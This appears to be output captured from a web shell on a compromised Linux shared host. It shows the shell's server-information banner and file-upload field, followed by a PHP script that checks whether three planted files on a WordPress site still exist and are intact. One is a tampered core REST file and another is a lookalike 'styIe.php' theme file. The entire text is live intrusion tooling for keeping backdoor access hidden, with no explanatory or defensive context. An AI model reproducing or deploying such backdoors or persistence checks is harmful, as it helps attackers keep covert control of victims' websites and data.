Server : Apache System : Linux iad1-shared-b8-43 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : dh_edsupp ( 6597262) PHP Version : 8.2.26 Disable Function : NONE Directory : /var/tmp/ |
Upload File : |
<?php $r = '/home/asl_tax/silvan-amberg.com'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@48299@@Server-Timing", "/wp-content/themes/search_template_1748020259/styIe.php"=>"bd@@257637@@727", "/d6b461.php"=>"bd@@18150@@105"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');